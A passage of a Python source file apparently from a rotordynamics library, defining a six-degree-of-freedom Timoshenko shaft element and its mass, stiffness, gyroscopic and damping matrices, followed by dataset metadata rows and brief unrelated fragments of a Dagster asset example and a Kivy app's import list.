Determine if rotary_inertia effects are taken into account;
Default is True.
gyroscopic : bool, optional
Determine if gyroscopic effects are taken into account;
Default is True.
tag : str, optional
Element tag;
Default is None.
Returns
-------
shaft_element : rs.ShaftElement6DoF
A 6 degrees of freedom shaft element, with available gyroscopic, shear and rotary inertia effects.
Attributes
----------
Poisson : float
Poisson coefficient for the element.
kappa : float
Shear coefficient for the element, determined from :cite:`Hutchingson2001`
formulation.
References
----------
.. bibliography::
:filter: docname in docnames
Examples
--------
>>> from ross.materials import steel
>>> shaft1 = ShaftElement6DoF(L=0.5, idl=0.0, odl=0.01, idr=0.0, odr=0.01,
... material=steel, n=0, axial_force=10, torque=30)
>>> shaft2 = ShaftElement6DoF(L=0.5, idl=0.05, odl=0.1, idr=0.05, odr=0.15,
... alpha=0.01, beta=100, material=steel,
... rotary_inertia=False, shear_effects=False)
>>> shaft2.kappa
0.7099387976608923
"""
@check_units
def __init__(
self,
L,
idl,
odl,
idr=None,
odr=None,
material=None,
n=None,
axial_force=0,
torque=0,
shear_effects=True,
rotary_inertia=True,
gyroscopic=True,
alpha=0,
beta=0,
tag=None,
):
if idr is None:
idr = idl
if odr is None:
odr = odl
if material is None:
raise AttributeError("Material is not defined.")
if type(material) is str:
self.material = Material.load_material(material)
else:
self.material = material
self.shear_effects = shear_effects
self.rotary_inertia = rotary_inertia
self.gyroscopic = gyroscopic
self.axial_force = axial_force
self.torque = torque
self._n = n
self.n_l = n
self.n_r = None
if n is not None:
self.n_r = n + 1
self.tag = tag
self.L = float(L)
self.o_d = (float(odl) + float(odr)) / 2
self.i_d = (float(idl) + float(idr)) / 2
self.idl = float(idl)
self.odl = float(odl)
self.idr = float(idr)
self.odr = float(odr)
self.color = self.material.color
# A_l = cross section area from the left side of the element
# A_r = cross section area from the right side of the element
A_l = np.pi * (odl ** 2 - idl ** 2) / 4
A_r = np.pi * (odr ** 2 - idr ** 2) / 4
self.A_l = A_l
self.A_r = A_r
# Second moment of area of the cross section from the left side
# of the element
Ie_l = np.pi * (odl ** 4 - idl ** 4) / 64
outer = self.odl ** 2 + self.odl * self.odr + self.odr ** 2
inner = self.idl ** 2 + self.idl * self.idr + self.idr ** 2
self.volume = np.pi * (self.L / 12) * (outer - inner)
self.m = self.material.rho * self.volume
roj = odl / 2
rij = idl / 2
rok = odr / 2
rik = idr / 2
# geometrical coefficients
delta_ro = rok - roj
delta_ri = rik - rij
a1 = 2 * np.pi * (roj * delta_ro - rij * delta_ri) / A_l
a2 = np.pi * (roj ** 3 * delta_ro - rij ** 3 * delta_ri) / Ie_l
b1 = np.pi * (delta_ro ** 2 - delta_ri ** 2) / A_l
b2 = (
3
* np.pi
* (roj ** 2 * delta_ro ** 2 - rij ** 2 * delta_ri ** 2)
/ (2 * Ie_l)
)
gama = np.pi * (roj * delta_ro ** 3 - rij * delta_ri ** 3) / Ie_l
delta = np.pi * (delta_ro ** 4 - delta_ri ** 4) / (4 * Ie_l)
self.a1 = a1
self.a2 = a2
self.b1 = b1
self.b2 = b2
self.gama = gama
self.delta = delta
# the area is calculated from the cross section located in the middle
# of the element
self.A = A_l * (1 + a1 * 0.5 + b1 * 0.5 ** 2)
# Ie is the second moment of area of the cross section - located in
# the middle of the element - about the neutral plane
Ie = Ie_l * (1 + a2 * 0.5 + b2 * 0.5 ** 2 + gama * 0.5 ** 3 + delta * 0.5 ** 4)
self.Ie = Ie
self.Ie_l = Ie_l
# geometric center
c1 = (
roj ** 2
+ 2 * roj * rok
+ 3 * rok ** 2
- rij ** 2
- 2 * rij * rik
- 3 * rik ** 2
)
c2 = (roj ** 2 + roj * rok + rok ** 2) - (rij ** 2 + rij * rik + rik ** 2)
self.beam_cg = L * c1 / (4 * c2)
self.axial_cg_pos = None
# Slenderness ratio of beam elements (G*A*L**2) / (E*I)
sld = (self.material.G_s * self.A * self.L ** 2) / (self.material.E * Ie)
self.slenderness_ratio = sld
# Moment of inertia
# fmt: off
self.Im = (
(np.pi * L * (self.m / self.volume) / 10) *
((roj ** 4 + roj ** 3 * rok + roj ** 2 * rok ** 2 + roj * rok ** 3 + rok ** 4) -
(rij ** 4 + rij ** 3 * rik + rij ** 2 * rik ** 2 + rij * rik ** 3 + rik ** 4))
)
# fmt: on
self.alpha = float(alpha)
self.beta = float(beta)
# Timoshenko kappa factor determination, based on the diameters relation
if self.__is_circular():
kappa = (6 * (1 + self.material.Poisson) ** 2) / (
7 + 12 * self.material.Poisson + 4 * self.material.Poisson ** 2
)
elif self.__is_thickwall():
a = (self.idl + self.idr) / 2
b = (self.odl + self.odr) / 2
v = self.material.Poisson
kappa = (6 * (a ** 2 + b ** 2) ** 2 * (1 + v) ** 2) / (
7 * a ** 4
+ 34 * a ** 2 * b ** 2
+ 7 * b ** 4
+ v * (12 * a ** 4 + 48 * a ** 2 * b ** 2 + 12 * b ** 4)
+ v ** 2 * (4 * a ** 4 + 16 * a ** 2 * b ** 2 + 4 * b ** 4)
)
else:
kappa = (1 + self.material.Poisson) / (2 + self.material.Poisson)
self.kappa = kappa
self.dof_global_index = None
def __is_circular(self):
return self.idl == 0 and self.idr == 0
def __is_thickwall(self):
p = (((self.odl + self.odr) / 2) - ((self.idl + self.idr) / 2)) / (
(self.odl + self.odr) / 2
)
return p >= 0.2
def __repr__(self):
"""Return a string representation of a shaft element.
Returns
-------
A string representation of a 6 DoF shaft object.
Examples
--------
>>> from ross.materials import steel
>>> shaft1 = ShaftElement6DoF(
... L=0.25, idl=0, idr=0, odl=0.05, odr=0.08,
... material=steel, rotary_inertia=True, shear_effects=True
... )
>>> shaft1 # doctest: +ELLIPSIS
ShaftElement6DoF(L=0.25, idl=0.0...
"""
return (
f"{self.__class__.__name__}"
f"(L={self.L:{0}.{5}}, idl={self.idl:{0}.{5}}, "
f"idr={self.idr:{0}.{5}}, odl={self.odl:{0}.{5}}, "
f"odr={self.odr:{0}.{5}}, material={self.material.name!r}, "
f"alpha={self.alpha:{0}.{5}}, beta={self.beta:{0}.{5}}, "
f"n={self.n})"
)
def __str__(self):
"""Convert object into string.
Returns
-------
The object's parameters translated to strings
Example
-------
>>> print(ShaftElement6DoF(L=0.25, idl=0, odl=0.05, odr=0.08, material=steel))
Element Number: None
Element Lenght (m): 0.25
Left Int. Diam. (m): 0.0
Left Out. Diam. (m): 0.05
Right Int. Diam. (m): 0.0
Right Out. Diam. (m): 0.08
Alpha damp. factor: 0.0
Beta damp. factor: 0.0
-----------------------------------
Steel
-----------------------------------
Density (kg/m**3): 7810.0
Young`s modulus (N/m**2): 2.11e+11
Shear modulus (N/m**2): 8.12e+10
Poisson coefficient : 0.29926108
"""
return (
f"Element Number: {self.n}"
f"\nElement Lenght (m): {self.L:{10}.{5}}"
f"\nLeft Int. Diam. (m): {self.idl:{10}.{5}}"
f"\nLeft Out. Diam. (m): {self.odl:{10}.{5}}"
f"\nRight Int. Diam. (m): {self.idr:{10}.{5}}"
f"\nRight Out. Diam. (m): {self.odr:{10}.{5}}"
f"\nAlpha damp. factor: {self.alpha:{10}.{5}}"
f"\nBeta damp. factor: {self.beta:{10}.{5}}"
f'\n{35*"-"}'
f"\n{self.material}"
)
def save(self, file):
signature = inspect.signature(self.__init__)
args_list = list(signature.parameters)
args = {arg: getattr(self, arg) for arg in args_list}
# add material characteristics so that the shaft element can be reconstructed
# even if the material is not in the available_materials file.
args["material"] = {
"name": self.material.name,
"rho": self.material.rho,
"E": self.material.E,
"G_s": self.material.G_s,
"color": self.material.color,
}
try:
data = toml.load(file)
except FileNotFoundError:
data = {}
data[f"{self.__class__.__name__}_{self.tag}"] = args
with open(file, "w") as f:
toml.dump(data, f)
@classmethod
def read_toml_data(cls, data):
data["material"] = Material(**data["material"])
return cls(**data)
def dof_mapping(self):
"""Degrees of freedom mapping.
Returns a dictionary with a mapping between degree of freedom and its index.
Returns
-------
dof_mapping : dict
A dictionary containing the degrees of freedom and their indexes.
Examples
--------
The numbering of the degrees of freedom for each node.
Being the following their ordering for a node:
x_0 - horizontal translation
y_0 - vertical translation
z_0 - axial translation
alpha_0 - rotation around horizontal
beta_0 - rotation around vertical
theta_0 - torsion around axial
>>> sh = ShaftElement6DoF(L=0.5, idl=0.05, odl=0.1, material=steel,
... rotary_inertia=True, shear_effects=True)
>>> sh.dof_mapping()["x_0"]
0
"""
return dict(
x_0=0,
y_0=1,
z_0=2,
alpha_0=3,
beta_0=4,
theta_0=5,
x_1=6,
y_1=7,
z_1=8,
alpha_1=9,
beta_1=10,
theta_1=11,
)
def M(self):
"""Mass matrix for an instance of a 6 DoF shaft element.
Returns
-------
M : np.ndarray
Mass matrix for the 6 DoF shaft element.
Examples
--------
>>> Timoshenko_Element = ShaftElement6DoF(0.25, 0, 0.05, material=steel)
>>> Timoshenko_Element.M().shape
(12, 12)
"""
# temporary material and geometrical constants
L = self.L
tempS = np.pi * (
((self.odr / 2) ** 2 + (self.odl / 2) ** 2) / 2
- ((self.idr / 2) ** 2 + (self.idl / 2) ** 2) / 2
)
tempI = (
np.pi
/ 4
* (
((self.odr / 2) ** 4 + (self.odl / 2) ** 4) / 2
- ((self.idr / 2) ** 4 + (self.idl / 2) ** 4) / 2
)
)
# element level matrix declaration
aux1 = self.material.rho * tempS * L / 420
# fmt: off
# Standard mass matrix
M = aux1 * np.array([
[ 156, 0, 0, 0, -22*L, 0, 54, 0, 0, 0, 13*L, 0],
[ 0, 156, 0, 22*L, 0, 0, 0, 54, 0, -13*L, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 22*L, 0, 4*L**2, 0, 0, 0, 13*L, 0,-3*L**2, 0, 0],
[-22*L, 0, 0, 0, 4*L**2, 0, -13*L, 0, 0, 0,-3*L**2, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 54, 0, 0, 0, -13*L, 0, 156, 0, 0, 0, 22*L, 0],
[ 0, 54, 0, 13*L, 0, 0, 0, 156, 0, -22*L, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, -13*L, 0,-3*L**2, 0, 0, 0, -22*L, 0, 4*L**2, 0, 0],
[ 13*L, 0, 0, 0,-3*L**2, 0, 22*L, 0, 0, 0, 4*L**2, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
])
# Secondary inertias mass matrix
Ms = self.material.rho * tempI / (30 * L) * np.array([
[ 36, 0, 0, 0, -3*L, 0, -36, 0, 0, 0, -3*L, 0],
[ 0, 36, 0, 3*L, 0, 0, 0, -36, 0, 3*L, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 3*L, 0,4*L**2, 0, 0, 0, -3*L, 0, -L**2, 0, 0],
[-3*L, 0, 0, 0,4*L**2, 0, 3*L, 0, 0, 0, -L**2, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ -36, 0, 0, 0, 3*L, 0, 36, 0, 0, 0, 3*L, 0],
[ 0, -36, 0, -3*L, 0, 0, 0, 36, 0, -3*L, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 3*L, 0, -L**2, 0, 0, 0, -3*L, 0,4*L**2, 0, 0],
[-3*L, 0, 0, 0, -L**2, 0, 3*L, 0, 0, 0,4*L**2, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
])
# Axial terms inertia matrix
Ma = self.material.rho * tempS * L / 6 * np.array([
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 2, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0, 0, 2, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
])
# Torsional terms inertias matrix
Mr = self.material.rho * tempI * L / 6 * np.array([
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 2],
])
# fmt: on
M = M + Ms + Ma + Mr
return M
def K(self):
"""Stiffness matrix for an instance of a 6 DoF shaft element.
Returns
-------
K : np.ndarray
Omega independent stiffness matrix for the 6 DoF shaft element.
Examples
--------
>>> from ross.materials import steel
>>> Timoshenko_Element = ShaftElement6DoF(0.25, 0, 0.05, material=steel)
>>> Timoshenko_Element.K().shape
(12, 12)
"""
# Axial force and torque applied to the element.
Fa = self.axial_force
T = self.torque
# temporary material and geometrical constants, determined as mean values
# from the left and right radii of the taperad shaft
L = self.L
tempS = np.pi * (
((self.odr / 2) ** 2 + (self.odl / 2) ** 2) / 2
- ((self.idr / 2) ** 2 + (self.idl / 2) ** 2) / 2
)
tempI = (
np.pi
/ 4
* (
((self.odr / 2) ** 4 + (self.odl / 2) ** 4) / 2
- ((self.idr / 2) ** 4 + (self.idl / 2) ** 4) / 2
)
)
tempJ = (
np.pi
/ 2
* (
((self.odr / 2) ** 4 + (self.odl / 2) ** 4) / 2
- ((self.idr / 2) ** 4 + (self.idl / 2) ** 4) / 2
)
)
# temporary variables
A = (
12
* self.material.E
* tempI
/ (self.material.G_s * self.kappa * tempS * L ** 2)
)
# auxiliary variables
a1 = self.material.E * tempI / ((1 + A) * L ** 3)
a2 = self.material.G_s * tempJ / L
a3 = self.material.E * tempS / L
# fmt: off
# pure stiffness matrix [Kc], added to the axial loads stiffness matrix [Ka],
# torsional stiffnesses matrix [Kr] and Tinoshenko shear compensation [Ks].
Kc_plus = a1 * np.array([
[ 12, 0, 0, 0, -6*L, 0, -12, 0, 0, 0, -6*L, 0],
[ 0, 12, 0, 6*L, 0, 0, 0, -12, 0, 6*L, 0, 0],
[ 0, 0, a3/a1, 0, 0, 0, 0, 0, -a3/a1, 0, 0, 0],
[ 0, 6*L, 0, L**2*(A + 4), 0, 0, 0, -6*L, 0,-L**2*(A - 2), 0, 0],
[-6*L, 0, 0, 0, L**2*(A + 4), 0, 6*L, 0, 0, 0,-L**2*(A - 2), 0],
[ 0, 0, 0, 0, 0, a2/a1, 0, 0, 0, 0, 0, -a2/a1],
[ -12, 0, 0, 0, 6*L, 0, 12, 0, 0, 0, 6*L, 0],
[ 0, -12, 0, -6*L, 0, 0, 0, 12, 0, -6*L, 0, 0],
[ 0, 0, -a3/a1, 0, 0, 0, 0, 0, a3/a1, 0, 0, 0],
[ 0, 6*L, 0,-L**2*(A - 2), 0, 0, 0, -6*L, 0, L**2*(A + 4), 0, 0],
[-6*L, 0, 0, 0,-L**2*(A - 2), 0, 6*L, 0, 0, 0, L**2*(A + 4), 0],
[ 0, 0, 0, 0, 0, -a2/a1, 0, 0, 0, 0, 0, a2/a1],
])
# stiffness matrix due to axial loading influence
Kf = Fa / (30 * L) * np.array([
[ 36, 0, 0, 0, -3*L, 0, -36, 0, 0, 0, -3*L, 0],
[ 0, 36, 0, 3*L, 0, 0, 0, -36, 0, 3*L, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 3*L, 0,4*L**2, 0, 0, 0, -3*L, 0, -L**2, 0, 0],
[-3*L, 0, 0, 0,4*L**2, 0, 3*L, 0, 0, 0, -L**2, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ -36, 0, 0, 0, 3*L, 0, 36, 0, 0, 0, 3*L, 0],
[ 0, -36, 0, -3*L, 0, 0, 0, 36, 0, -3*L, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 3*L, 0, -L**2, 0, 0, 0, -3*L, 0,4*L**2, 0, 0],
[-3*L, 0, 0, 0, -L**2, 0, 3*L, 0, 0, 0,4*L**2, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
])
# stiffness matrix due to torque loading influence
Kt = T * np.array([
[ 0, 0, 0, -1/L, 0, 0, 0, 0, 0, 1/L, 0, 0],
[ 0, 0, 0, 0, -1/L, 0, 0, 0, 0, 0, 1/L, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[-1/L, 0, 0, 0, 1/2, 0, 1/L, 0, 0, 0, 1/2, 0],
[ 0, -1/L, 0, -1/2, 0, 0, 0, 1/L, 0, -1/2, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 1/L, 0, 0, 0, 0, 0, -1/L, 0, 0],
[ 0, 0, 0, 0, 1/L, 0, 0, 0, 0, 0, -1/L, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 1/L, 0, 0, 0, -1/2, 0, -1/L, 0, 0, 0, -1/2, 0],
[ 0, 1/L, 0, 1/2, 0, 0, 0, -1/L, 0, 1/2, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
])
# fmt: on
# Dynamic stiffness matrix is added independently in "def Kst"
# Kst = self.material.rho*tempI/(15*L)*np.array(12,12)
K = Kc_plus + Kf + Kt
return K
def Kst(self):
"""Dynamic stiffness matrix for an instance of a 6 DoF shaft element.
Dynamic stiffness matrix for the 6 DoF shaft element. This is
directly dependent on the rotation speed Omega. It needs to be
multiplied by the adequate Omega value when used in time depen-
dent analyses. The matrix multiplier term is:
[(Iz*Omega*rho)/(15*L)] * [Kst]
and here the Omega value has been suppressed and must be added
in the adequate analyses.
Returns
-------
Kst : np.ndarray
Dynamic stiffness matrix for the 6 DoF shaft element.
Examples
--------
>>> from ross.materials import steel
>>> Timoshenko_Element = ShaftElement6DoF(0.25, 0, 0.05, material=steel)
>>> Timoshenko_Element.Kst().shape
(12, 12)
"""
# temporary material and geometrical constants, determined as mean values
# from the left and right radii of the taperad shaft
L = self.L
tempI = (
np.pi
/ 4
* (
((self.odr / 2) ** 4 + (self.odl / 2) ** 4) / 2
- ((self.idr / 2) ** 4 + (self.idl / 2) ** 4) / 2
)
)
# fmt: off
# dynamic stiffening matrix
Kst = self.material.rho * tempI / (15 * L) * np.array([
[0, -36, 0, -3*L, 0, 0, 0, 36, 0, -3*L, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 3*L, 0, 4*L**2, 0, 0, 0, -3*L, 0, -L**2, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 36, 0, 3*L, 0, 0, 0, -36, 0, 3*L, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 3*L, 0, -L**2, 0, 0, 0, -3*L, 0, 4*L**2, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
])
# fmt: on
return Kst
def C(self):
"""Proportional damping matrix for an instance of a 6 DoF shaft element.
Returns
-------
C : np.ndarray
Proportional damping matrix for the 6 DoF shaft element.
Examples
--------
>>> from ross.materials import steel
>>> shaft = ShaftElement6DoF(L=0.25, idl=0, odl=0.05, material=steel)
>>> shaft.C().shape
(12, 12)
"""
# proportional damping matrix
C = self.alpha * self.M() + self.beta * self.K()
return C
def G(self):
"""Gyroscopic matrix for an instance of a 6 DoFs shaft element.
Gyroscopic matrix for the 6 DoF shaft element. Similar to the Kst
stiffness matrix, this Gyro matrix is also multiplied by the value
of the rotating speed Omega. It is omitted from this and must be
added in the respective analyses.
Returns
-------
G : np.ndarray
Gyroscopic matrix for the 6 DoF shaft element.
Examples
--------
>>> from ross.materials import steel
>>> shaft = ShaftElement6DoF(0.25, 0, 0.05, material=steel)
>>> shaft.G().shape
(12, 12)
"""
if self.gyroscopic:
# temporary material and geometrical constants, determined as mean values
# from the left and right radii of the tapered shaft
L = self.L
tempI = (
np.pi
/ 4
* (
((self.odr / 2) ** 4 + (self.odl / 2) ** 4) / 2
- ((self.idr / 2) ** 4 + (self.idl / 2) ** 4) / 2
)
)
# fmt: off
# Gyroscopic effect matrix
G = (self.material.rho * tempI / (15 * L)) * np.array([
[ 0, -36, 0, -3*L, 0, 0, 0, 36, 0, -3*L, 0, 0],
[ 36, 0, 0, 0, -3*L, 0, -36, 0, 0, 0, -3*L, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[3*L, 0, 0, 0,-4*L**2, 0, -3*L, 0, 0, 0, L**2, 0],
[ 0, 3*L, 0,4*L**2, 0, 0, 0, -3*L, 0, -L**2, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 36, 0, 3*L, 0, 0, 0, -36, 0, 3*L, 0, 0],
[-36, 0, 0, 0, 3*L, 0, 36, 0, 0, 0, 3*L, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[3*L, 0, 0, 0, L**2, 0, -3*L, 0, 0, 0,-4*L**2, 0],
[ 0, 3*L, 0, -L**2, 0, 0, 0, -3*L, 0,4*L**2, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
])
# fmt: on
else:
G = np.zeros((12, 12))
return G
@classmethod
def from_table(cls, file, sheet_type="Simple", sheet_name=0):
"""Instantiate one or more shafts using inputs from an Excel table.
A header with the names of the columns is required. These names should
match the names expected by the routine (usually the names of the
parameters, but also similar ones). The program will read every row
bellow the header until they end or it reaches a NaN.
Parameters
----------
file : str
Path to the file containing the shaft parameters.
sheet_type : str, optional
Describes the kind of sheet the function should expect:
Simple: The input table should specify only the number of the materials
to be used.
They must be saved prior to calling the method.
Model: The materials parameters must be passed along with the shaft
parameters. Each material must have an id number and each shaft must
reference one of the materials ids.
sheet_name : int or str, optional
Position of the sheet in the file (starting from 0) or its name. If none is
passed, it is assumed to be the first sheet in the file.
Returns
-------
shaft: list
A list of shaft objects.
"""
parameters = read_table_file(
file, "shaft", sheet_name=sheet_name, sheet_type=sheet_type
)
list_of_shafts = []
if sheet_type == "Model":
new_materials = {}
for i in range(0, len(parameters["matno"])):
new_material = Material(
name="shaft_mat_" + str(parameters["matno"][i]),
rho=parameters["rhoa"][i],
E=parameters["ea"][i],
G_s=parameters["ga"][i],
)
new_materials["shaft_mat_" + str(parameters["matno"][i])] = new_material
for i in range(0, len(parameters["L"])):
list_of_shafts.append(
cls(
L=parameters["L"][i],
i_d=parameters["i_d"][i],
o_d=parameters["o_d"][i],
alpha=parameters["alpha"][i],
beta=parameters["beta"][i],
material=new_materials[parameters["material"][i]],
n=parameters["n"][i],
axial_force=parameters["axial_force"][i],
torque=parameters["torque"][i],
gyroscopic=parameters["gyroscopic"][i],
)
)
elif sheet_type == "Simple":
for i in range(0, len(parameters["L"])):
list_of_shafts.append(
cls(
L=parameters["L"][i],
i_d=parameters["i_d"][i],
o_d=parameters["o_d"][i],
alpha=parameters["alpha"][i],
beta=parameters["beta"][i],
material=parameters["material"][i],
n=parameters["n"][i],
axial_force=parameters["axial_force"][i],
torque=parameters["torque"][i],
gyroscopic=parameters["gyroscopic"][i],
)
)
return list_of_shafts
@classmethod
def section(
cls,
L,
ne,
s_idl,
s_odl,
s_idr=None,
s_odr=None,
alpha=0,
beta=0,
material=None,
n=None,
gyroscopic=True,
):
"""Shaft section constructor.
This method will create a shaft section with length 'L' divided into
'ne' elements.
Parameters
----------
odl : float, pint.Quantity
Outer diameter of the element at the left node.
idr : float, pint.Quantity, optional
Inner diameter of the element at the right node;
Default is equal to idl value for cylindrical element.
odr : float, pint.Quantity, optional
Outer diameter of the element at the right node;
Default is equal to odl value for cylindrical element.
E : float
Young's modulus.
G_s : float
Shear modulus.
alpha : float
Proportional damping coefficient, associated to the element Mass matrix
beta : float
Proportional damping coefficient, associated to the element Stiffness matrix
material : ross.material
Shaft material.
n : int, optional
Element number (coincident with it's first node).
If not given, it will be set when the rotor is assembled
according to the element's position in the list supplied to
the rotor constructor.
axial_force : float
Axial force.
torque : float
Torque.
gyroscopic : bool
Determine if gyroscopic effects are taken into account.
Default is False.
Returns
-------
elements : list
List with the 'ne' shaft elements.
Examples
--------
>>> # shaft material
>>> from ross.materials import steel
>>> # shaft inner and outer diameters
>>> s_idl = 0
>>> s_odl = 0.01585
>>> sec = ShaftElement.section(247.65e-3, 4, 0, 15.8e-3, material=steel)
>>> len(sec)
4
>>> sec[0].i_d
0.0
"""
if s_idr is None:
s_idr = s_idl
if s_odr is None:
s_odr = s_odl
le = L / ne
elements = [
cls(
le,
(s_idr - s_idl) * i * le / L + s_idl,
(s_odr - s_odl) * i * le / L + s_odl,
(s_idr - s_idl) * (i + 1) * le / L + s_idl,
(s_odr - s_odl) * (i + 1) * le / L + s_odl,
alpha,
beta,
material,
n,
gyroscopic,
)
for i in range(ne)
]
return elements
| 36.640842
| 123
| 0.427992
| 9,807
| 76,616
| 3.282553
| 0.070052
| 0.061257
| 0.068868
| 0.076168
| 0.792588
| 0.767023
| 0.741551
| 0.724683
| 0.707101
| 0.689861
| 0
| 0.096272
| 0.435327
| 76,616
| 2,090
| 124
| 36.658373
| 0.647828
| 0.32009
| 0
| 0.63125
| 0
| 0.001786
| 0.059152
| 0.01463
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028571
| false
| 0
| 0.008929
| 0.001786
| 0.064286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
4c57590371a275f6410cb28ff43a18402dbb07ee
| 226
|
py
|
Python
|
examples/docs_snippets/docs_snippets/concepts/assets/asset_dependency.py
|
kstennettlull/dagster
|
dd6f57e170ff03bf145f1dd1417e0b2c3156b1d6
|
[
"Apache-2.0"
] | null | null | null |
examples/docs_snippets/docs_snippets/concepts/assets/asset_dependency.py
|
kstennettlull/dagster
|
dd6f57e170ff03bf145f1dd1417e0b2c3156b1d6
|
[
"Apache-2.0"
] | null | null | null |
examples/docs_snippets/docs_snippets/concepts/assets/asset_dependency.py
|
kstennettlull/dagster
|
dd6f57e170ff03bf145f1dd1417e0b2c3156b1d6
|
[
"Apache-2.0"
] | 1
|
2019-09-11T03:02:27.000Z
|
2019-09-11T03:02:27.000Z
|
# pylint: disable=redefined-outer-name
from dagster import asset
# start_marker
@asset
def upstream_asset():
return [1, 2, 3]
@asset
def downstream_asset(upstream_asset):
return upstream_asset + [4]
# end_marker
| 13.294118
| 38
| 0.730088
| 31
| 226
| 5.129032
| 0.645161
| 0.245283
| 0.238994
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02139
| 0.172566
| 226
| 16
| 39
| 14.125
| 0.828877
| 0.265487
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0.142857
| 0.285714
| 0.714286
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
4c63516cc651b4661204e4bbca3cc6b21eae41ae
| 45,357
|
py
|
Python
|
main.py
|
kiok46/Weather
|
9002bccc885844576a242913c99b0f0d5c1dbb3d
|
[
"MIT"
] | null | null | null |
main.py
|
kiok46/Weather
|
9002bccc885844576a242913c99b0f0d5c1dbb3d
|
[
"MIT"
] | null | null | null |
main.py
|
kiok46/Weather
|
9002bccc885844576a242913c99b0f0d5c1dbb3d
|
[
"MIT"
] | null | null | null |
#imports
import gesture_box as gesture
import json
import urllib2
import calendar_part
import pingpong
import threading
import traceback
import requests
from kivy.app import App
from kivy.uix.floatlayout import FloatLayout
from kivy.lang import Builder
from kivy.factory import Factory
from kivy.uix.listview import ListItemButton
from kivy.storage.jsonstore import JsonStore
from kivy.network.urlrequest import UrlRequest
from kivy.uix.boxlayout import BoxLayout
from kivy.garden.modernmenu import MenuSpawner,ModernMenu
